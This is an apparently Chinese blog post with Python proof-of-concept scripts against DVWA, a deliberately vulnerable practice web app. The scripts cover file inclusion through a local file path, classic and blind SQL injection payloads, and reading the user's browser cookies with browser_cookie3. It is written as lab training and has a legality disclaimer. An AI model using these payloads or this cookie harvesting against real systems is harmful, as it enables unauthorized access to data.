POC——DVWA‘s File Inclusion

文件包含漏洞的验证POC比较简单,仅需get访问即可。不过有一个前提——已经把将要利用的文件传入对方服务器内,且明确利用的文件所在位置~

import requests
import browser_cookie3

cookie = browser_cookie3.chrome()
url = r"http://192.168.117.130/DVWA-1.9/vulnerabilities/fi/?page=file:///C:\Users\wavesky\Desktop/1.txt"
response = requests.get(url=url,cookies=cookie)

re = 'PHP Version'
flag=re in str(response.content)

if flag:
    print("It looks likely vulnerable")
else:
    print("It is strong")

三个Level均可,直接下一个~

DVWA(Damn Vulnerable Web Application)进行SQL注入和盲注攻击是为了演示和学习安全性问题,需要在合法授权和合规的环境下进行。以下是一个简单的POC(Proof of Concept)来对DVWA进行SQL注入和盲注攻击: 1. SQL注入攻击: ```python import requests # 设置目标URL和payload target_url = "http://dvwa.com/vulnerabilities/sqli/?id=" payload = "' OR '1'='1'-- " # 发送注入请求 response = requests.get(target_url + payload) # 判断注入是否成功 if "User ID exists in the database." in response.text: print("SQL注入成功!") else: print("SQL注入失败!") ``` 在上述代码,我们构造了一个payload,其使用了SQL注入的技巧,目的是绕过原始查询条件,使查询结果始终为真。然后,我们使用requests库发送带有payload的GET请求到目标URL。最后,根据返回的响应内容来判断注入是否成功。 2. 盲注攻击: ```python import requests # 设置目标URL和payload target_url = "http://dvwa.com/vulnerabilities/sqli_blind/" payload = "' OR substring((SELECT database()), 1, 1)='d'-- " # 发送盲注请求 response = requests.get(target_url + "?id=" + payload) # 判断盲注是否成功 if "User ID exists in the database." in response.text: print("盲注成功!") else: print("盲注失败!") ``` 在上述代码,我们构造了一个payload,其使用了盲注的技巧,通过逐个查询数据库名称的字符,并通过判断响应内容来确定字符是否正确。然后,我们使用requests库发送带有payload的GET请求到目标URL。最后,根据返回的响应内容来判断盲注是否成功。 请注意,以上代码仅用于演示和学习目的,不得用于非法用途。在实际环境进行安全测试时,请遵循合法和合规的规定,并获得合适的授权。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值